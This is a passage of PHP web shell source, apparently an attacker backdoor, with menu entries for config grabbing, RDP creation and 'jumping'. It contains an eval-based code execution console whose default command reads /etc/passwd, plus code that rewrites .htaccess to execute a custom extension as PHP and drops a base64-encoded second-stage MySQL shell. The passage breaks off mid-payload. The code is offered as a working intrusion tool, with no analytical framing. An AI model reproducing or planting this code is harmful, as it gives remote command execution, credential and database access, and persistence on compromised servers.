  769. <a href="?<?php echo "y=".$pwd; ?>&amp;x=hashid">Hash ID</a>
  770. <a href="?<?php echo "y=".$pwd; ?>&amp;x=string">Script Encode</a>
  771. <a href="?<?php echo "y=".$pwd; ?>&amp;x=rdp">Create Rdp</a>
  772. <a href="?<?php echo "y=".$pwd; ?>&amp;x=grabber">Config Grabber
  773. <a href="?<?php echo "y=".$pwd; ?>&amp;x=jumping">Jumping</a>
  774. <a href="?<?php echo "y=".$pwd; ?>&amp;x=tutor">Tutorial & Ebook</a>
  775. <a href="?<?php echo "y=".$pwd; ?>&amp;x=about">About</a>
  776. <a href="?<?php echo "y=".$pwd; ?>&amp;x=logout">Log-Out</a>
  777. <br><br>
  778.  
  779.  
  780. </div></center>
  781. <!-- menu end -->
  782.  
  783. <?php
  784. @ini_set('display_errors', 0);
  785. if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
  786. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  787. <table class="cmdbox">
  788. <tr><td>
  789. <textarea class="output" name="cmd" id="cmd">
  790. <?php
  791. if(isset($_POST['submitcmd'])) {
  792. echo eval(magicboom($_POST['cmd']));
  793. }
  794. else echo "echo file_get_contents('/etc/passwd');";
  795. ?>
  796. </textarea>
  797. <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
  798. </table>
  799. </form>
  800.  
  801. <?php }
  802.  
  803. elseif(isset($_GET['x']) && ($_GET['x'] == 'sql'))
  804. {
  805. ?>
  806. <form action="?y=<?php echo $pwd; ?>&amp;x=sql" method="post">
  807. <?php
  808. echo "<center/><br/><b><font color=#FFFFFF>+--==[ Mysql Interface ]==--+</font></b><br><br>";
  809. mkdir('mysql', 0755);
  810. chdir('mysql');
  811. $akses = ".htaccess";
  812. $buka_lah = "$akses";
  813. $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!");
  814. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  815. AddType application/x-httpd-php .cpc
  816. ";
  817. fwrite ( $buka , $metin ) ;
  818. fclose ($buka);
  819. $sqlshell = 'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIsICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVjaG9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kdW1wREImZGJuYW1lPSRkYm5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHVtcCBEYXRhYmFzZSBcJyRkYm5hbWVcJz8nKVwiPkR1bXA8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gY3JlYXRlRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2NyZWF0ZV9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbGlzdERhdGFiYXNlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2Ryb3BfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCWxpc3REYXRhYmFzZXMoKTsNCn0NCg0KZnVuY3Rpb24gbGlzdFRhYmxlcygpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkUEhQX1NFTEY7DQoJZWNobyAiPGgxPlRhYmxlcyBMaXN0PC9oMT5cbiI7DQoJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Y3JlYXRlVGFibGU+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9dGFibGVuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBUYWJsZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9cXVlcnk+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IHNpemU9MTIwIG5hbWU9cXVlcnlTdHI+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUXVlcnknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBUYWJsZSA9IG15c3FsX2xpc3RfdGFibGVzKCAkZGJuYW1lICk7DQoJaWYoICRwVGFibGUgPT0gMCApIHsNCgkJJG1zZyAgPSBteXNxbF9lcnJvcigpOw0KCQllY2hvICI8aDM+RXJyb3IgOiAkbXNnPC9oMz48cD5cbiI7DQoJCXJldHVybjsNCgl9DQoJJG51bSA9IG15c3FsX251bV9yb3dzKCAkcFRhYmxlICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJHRhYmxlbmFtZSA9IG15c3FsX3RhYmxlbmFtZSggJHBUYWJsZSwgJGkgKTsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiJHRhYmxlbmFtZVxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5EYXRhPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5Ecm9wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHVtcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0R1bXAgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5EdW1wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPiI7DQp9DQoNCmZ1bmN0aW9uIGNyZWF0ZVRhYmxlKCkgew0KDQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkNSRUFURSBUQUJMRSAkdGFibGVuYW1lICggbm8gSU5UICkiOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbXlzcWxfcXVlcnkoICRxdWVyeVN0ciwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJbGlzdFRhYmxlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wVGFibGUoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkRST1AgVEFCTEUgJHRhYmxlbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCglsaXN0VGFibGVzKCk7DQp9DQoNCmZ1bmN0aW9uIHZpZXdTY2hlbWEoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJZWNobyAiPGgxPlRhYmxlIFNjaGVtYTwvaDE+XG4iOw0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvUXVlcnlSZXN1bHQoKTsNCgllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWFkZEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRmllbGQ8L2E+IHwgXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5WaWV3IERhdGE8L2E+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgIlNIT1cgZmllbGRzIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+RmllbGQ8L3RoPlxuIjsNCgllY2hvICI8dGg+VHlwZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5OdWxsPC90aD5cbiI7DQoJZWNobyAiPHRoPktleTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5EZWZhdWx0PC90aD5cbiI7DQoJZWNobyAiPHRoPkV4dHJhPC90aD5cbiI7DQoJZWNobyAiPHRoIGNvbHNwYW49Mj5BY3Rpb248L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCg0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2FycmF5KCAkcFJlc3VsdCApOw0KCQllY2hvICI8dHI+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIkZpZWxkIl0uIjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIlR5cGUiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiTnVsbCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJLZXkiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiRGVmYXVsdCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJFeHRyYSJdLiI8L3RkPlxuIjsNCgkJJGZpZWxkbmFtZSA9ICRmaWVsZFsiRmllbGQiXTsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZWRpdEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJmZpZWxkbmFtZT0kZmllbGRuYW1lJz5FZGl0PC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kcm9wRmllbGQmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmZmllbGRuYW1lPSRmaWVsZG5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHJvcCBGaWVsZCBcJyRmaWVsZG5hbWVcJz8nKVwiPkRyb3A8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbWFuYWdlRmllbGQoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBGaWVsZDwvaDE+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aDE+RWRpdCBGaWVsZDwvaDE+XG4iOw0KCQkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCQkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCQkkZmllbGQgPSBteXNxbF9mZXRjaF9hcnJheSggJHBSZXN1bHQgKTsNCgkJCWlmKCAkZmllbGRbIkZpZWxkIl0gPT0gJGZpZWxkbmFtZSApIHsNCgkJCQkkZmllbGR0eXBlID0gJGZpZWxkWyJUeXBlIl07DQoJCQkJJGZpZWxka2V5ID0gJGZpZWxkWyJLZXkiXTsNCgkJCQkkZmllbGRleHRyYSA9ICRmaWVsZFsiRXh0cmEiXTsNCgkJCQkkZmllbGRudWxsID0gJGZpZWxkWyJOdWxsIl07DQoJCQkJJGZpZWxkZGVmYXVsdCA9ICRmaWVsZFsiRGVmYXVsdCJdOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQl9DQoNCgkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCWlmKCBzdHJwb3MoICRmaWVsZHR5cGUsICIoIiApICkgew0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCSR2YWx1ZWxpc3QgPSBzdHJ0b2soICIgKClcbiIgKTsNCgkJCX0gZWxzZSB7DQoJCQkJJE0gPSBzdHJ0b2soICIgKCwpXG4iICk7DQoJCQkJaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgIiwiICkgKQ0KCQkJCQkkRCA9IHN0cnRvayggIiAoLClcbiIgKTsNCgkJCX0NCgkJfQ0KCX0NCg0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JFBIUF9TRUxGPlxuIjsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1hZGRGaWVsZF9zdWJtaXQ+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9ZWRpdEZpZWxkX3N1Ym1pdD5cbiI7DQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPW9sZF9uYW1lIHZhbHVlPSRmaWVsZG5hbWU+XG4iOw0KCX0NCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kYm5hbWUgdmFsdWU9JGRibmFtZT5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9dGFibGVuYW1lIHZhbHVlPSR0YWJsZW5hbWU+XG4iOw0KCWVjaG8gIjxoMz5OYW1lPC9oMz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5hbWUgdmFsdWU9JGZpZWxkbmFtZT48cD5cbiI7DQoJZWNobyAnDQoNCjxoMz5UeXBlPC9oMz4NCjxmb250IHNpemU9MiBjbGFzcz0ibmV3Ij4NCiogYE1cJyBpbmRpY2F0ZXMgdGhlIG1heGltdW0gZGlzcGxheSBzaXplLjxicj4NCiogYERcJyBhcHBsaWVzIHRvIGZsb2F0aW5nLXBvaW50IHR5cGVzIGFuZCBpbmRpY2F0ZXMgdGhlIG51bWJlciBvZiBkaWdpdHMgZm9sbG93aW5nIHRoZSBkZWNpbWFsIHBvaW50Ljxicj4NCjwvZm9udD4NCjx0YWJsZT4NCjx0cj4NCjx0aD5UeXBlPC90aD48dGg+Jm5ic3BNJm5ic3A8L3RoPjx0aD4mbmJzcEQmbmJzcDwvdGg+PHRoPnVuc2lnbmVkPC90aD48dGg+emVyb2ZpbGw8L3RoPjx0aD5iaW5hcnk8L3RoPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllJTlQiICc7IGlmKCAkdHlwZSA9PSAidGlueWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElOWUlOVCAoLTEyOCB+IDEyNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iU01BTExJTlQiICc7IGlmKCAkdHlwZSA9PSAic21hbGxpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNNQUxMSU5UICgtMzI3NjggfiAzMjc2Nyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNSU5UIiAnOyBpZiggJHR5cGUgPT0gIm1lZGl1bWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNSU5UICgtODM4ODYwOCB+IDgzODg2MDcpPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IklOVCIgJzsgaWYoICR0eXBlID09ICJpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPklOVCAoLTIxNDc0ODM2NDggfiAyMTQ3NDgzNjQ3KTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJCSUdJTlQiICc7IGlmKCAkdHlwZSA9PSAiYmlnaW50IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CSUdJTlQgKC05MjIzMzcyMDM2ODU0Nzc1ODA4IH4gOTIyMzM3MjAzNjg1NDc3NTgwNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iRkxPQVQiICc7IGlmKCAkdHlwZSA9PSAiZmxvYXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkZMT0FUPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+T